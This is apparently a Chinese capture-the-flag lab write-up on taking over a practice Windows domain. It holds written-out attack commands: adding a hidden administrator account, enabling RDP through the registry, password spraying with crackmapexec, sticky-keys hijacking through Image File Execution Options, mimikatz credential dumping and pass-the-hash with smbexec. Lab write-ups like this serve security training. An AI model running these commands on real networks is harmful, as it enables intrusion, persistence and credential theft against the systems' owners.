flag01

在使用fscan扫描的时候发现存在sqlserver(mssql)弱口令,使用MDUT连接,然后在公网vps起teamserver,往mssql中传cs木马直接上线
image.png
最后发现需要提权,因为是mssql系列,考虑Potato提权
image.png
使用SweetPotato执行beacon.exe实现system权限木马上线
image.png
然后在admin中找到flag01
image.png
这里是我创建了一个新用户,登录进去之后访问的flag01

1
2
3
net user fault qwer1234! /add
net localgroup administrators fault /add
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

image.png

flag02

然后我们继续探测内网,传一个fscan上去扫描内网,发现dc机器
image.png
到这里,我们搜集用户信息

1
shell net user

找到还有一个john用户,然后我们尝试看看这个用户是不是在线用户,是的话我们可以考虑直接注入进程

1
shell quser || qwinst

发现是在线用户,我们直接进行进程注入
image.png
这样我们就能以john用户登录这台机器了
执行net use时发现一个敏感文件,获得提示说要劫持镜像,并且获得一个用户名和密码,这里我们使用密码喷洒看看,不过在此之前最重要的就是代理搭建,这里我使用了chisel
https://github.com/jpillora/chisel/releases/tag/v1.10.0
在自己的vps上起
image.png
再用我们起初拿到权限的那个win当跳板机
image.png
再在自己的kali中的proxychains中这样配置
image.png
image.png

之后使用impacket进行密码喷洒,喷洒到了,但是发现密码过期了,那么我们就需要修改密码了

1
proxychains -q crackmapexec smb 172.22.8.0/24 -u 'Aldrich' -p 'Ald@rLMWuy7Z!#'


修改密码如下

1
proxychains4 -q python3 smbpasswd.py xiaorang.lab/Aldrich:'Ald@rLMWuy7Z!#'@172.22.8.15 -newpass 'fault@2444'

然后开始测试内网中开了rdp服务的机器,看看哪个能登上去,最后发现是46这台机器
然后提示镜像劫持,我们使用如下命令

1
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /v Debugger /t REG_SZ /d "C:\Windows\System32\cmd.exe"

之后在开始界面锁定用户,连按五下shift就可以获得system权限,用这个权限就可以拿到flag02

flag03

之后我们使用这个权限来上线cs木马
这里我们需要使用刚才已经上线的木马当作listener来使用

之后我们进行域内的信息搜集

1
2
3
logonpasswords 
shell net user /domain
shell net group "domain admins" /domain

之后我们直接往这个已经有system权限的机器中传mimikatz来抓hash
image.png

1
proxychains python3 smbexec.py -hashes :2c9d81bdcf3ec8b1def10328a7cc2f08 administrator@172.22.8.15

image.png
至此我们就拿到了三个flag